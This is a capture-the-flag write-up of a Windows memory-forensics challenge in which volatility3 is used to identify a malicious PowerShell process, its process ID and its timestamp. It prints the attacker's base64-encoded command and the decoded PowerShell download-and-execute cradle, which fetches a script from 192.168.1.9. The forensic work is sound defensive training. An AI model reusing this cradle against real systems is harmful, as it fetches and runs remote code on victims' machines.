Memory Forensics — Windows

Auth0 — CTF

Introduction

This is the writeup for Compromised challenge, from Auth0 CTF.

We are given with compromised.raw file of 2GB. First I wasn’t sure on what kind of artifact it was. whether Memory dump or corrupted disk image.
After unsuccessful attempts on trying to run with Autopsy, I was sure that this is a memory dump. We will be analyzing the image with volatility3.

Finding the Operating System of Memory Dump

• Checking if the image is Linux

Strings output on Compromised.raw

thus, we can see this doesn’t look like Linux OS’s memory dump. But for more confirmation you could also look for other strings which are present in Linux like the following strings

Example of strings which can be used to GREP on the memory dump

• Checking if its Windows

Strings output on Compromised.raw

I feel like this could be windows memory dump.

Analysis

Let’s list the proccesses

• Process List

windows.pslist

Pslist

• Process Tree

windows.pstree

Pstree

PowerShell looks suspicious to me., The challenge description asks for malicious process, malicious ID and Timestamp.

I cross checked all the process’s name and the process execution location. Everything was in correct place.

• Checking commands executed

windows.cmdline

Commands executed by the process

The following is the string which is executed:

aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADkAOgA4ADAALwA1ADQALgBwAHMAMQAnACkAKQA=

When base64 decoded we get iex ((new-object net.webclient).downloadstring('http://192.168.1.9:80/54.ps1'))

Putting it together

I assume the attacker has got shell previously and he tried downloading the exploit script from his attack box. Thus the IP of the Attacker is 192.168.1.9 and Malicious Process PowerShell.exe and Process ID: 2880 and Timestamp 2021-02-06 00:41:29

Kuddos Challenge is solved 🥳🥳!